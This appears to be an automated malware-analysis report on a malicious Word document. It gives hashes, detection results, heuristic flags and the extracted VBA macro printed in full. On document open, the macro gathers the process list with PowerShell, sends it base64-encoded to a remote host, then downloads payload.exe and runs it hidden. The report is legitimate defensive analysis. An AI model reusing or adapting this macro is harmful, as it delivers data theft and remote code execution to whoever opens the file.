Office (OOXML) / .DOCX malware analysis — malicious · ff9e5e2379d44f59

MALICIOUS

Office (OOXML) / .DOCX

18.4 KB Created: 2026-05-08 15:48:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2026-06-26

MD5: 2409c90bfd6181ef0030b3a9ccc2fc12 SHA-1: 367922ac1244bfcba7ec228dee0dc014bb355918 SHA-256: ff9e5e2379d44f59ee8d1991343fe2acfb433e81a9b415865ca6ee888d1a68b2

470 Risk Score

Heuristics 10

ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
VBA project inside OOXML medium 7 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
    Dim shell As Object
```
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
    Set shell = CreateObject("WScript.Shell")
```

PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA

Matched line in script

    psCommand = "powershell.exe -Command ""Get-WmiObject -Query 'SELECT * FROM Win32_Process' | ForEach-Object { $_.ProcessName + ' ' + $_.ProcessId + ' ' + $_.ExecutablePath } | Out-String | ForEach-Object { [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($_)) }"""

VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
    adoStream.Write xmlHTTP.ResponseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set shell = CreateObject("WScript.Shell")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://10.222.6.128/receiver.php?data= Referenced by macro
- http://10.222.6.128/payload.exeReferenced by macro
- https://[Substrate.BaseHost]/search/api/v1/recommendationsReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.microsoft.com/office/2019/extlstReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2023/wordml/word16duReferenced by macro
- http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashReferenced by macro
- http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlockReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1818 bytes
SHA-256: `1f112c341ed50b6100fb56384bcd54144f811a9c178b8f3cf189dad3adec3883`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim shell As Object Set shell = CreateObject("WScript.Shell") ' Discovery: Get process information using PowerShell Dim psCommand As String psCommand = "powershell.exe -Command ""Get-WmiObject -Query 'SELECT * FROM Win32_Process' \| ForEach-Object { $_.ProcessName + ' ' + $_.ProcessId + ' ' + $_.ExecutablePath } \| Out-String \| ForEach-Object { [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($_)) }""" Dim processInfo As String processInfo = shell.Exec(psCommand).StdOut.ReadAll ' C2: Send the discovery data to the remote server Dim http As Object Set http = CreateObject("MSXML2.XMLHTTP") http.Open "GET", "http://10.222.6.128/receiver.php?data=" & processInfo, False http.Send ' Execution: Download and execute a payload Dim payloadURL As String payloadURL = "http://10.222.6.128/payload.exe" Dim payloadPath As String payloadPath = shell.ExpandEnvironmentStrings("%TEMP%") & "\payload.exe" Dim xmlHTTP As Object Set xmlHTTP = CreateObject("MSXML2.XMLHTTP") xmlHTTP.Open "GET", payloadURL, False xmlHTTP.Send Dim adoStream As Object Set adoStream = CreateObject("ADODB.Stream") adoStream.Type = 1 ' adTypeBinary adoStream.Open adoStream.Write xmlHTTP.ResponseBody adoStream.SaveToFile payloadPath, 2 ' adSaveCreateOverWrite ' Execute the downloaded payload shell.Run payloadPath, 0, True End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	10240 bytes
SHA-256: `605070b771e8ac25a4a3ac7c2bf6c5bc2fe6a6c70cc4ea1da88eb6333212add9`
Detection ClamAV: Doc.Dropper.Agent-6412232-1 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.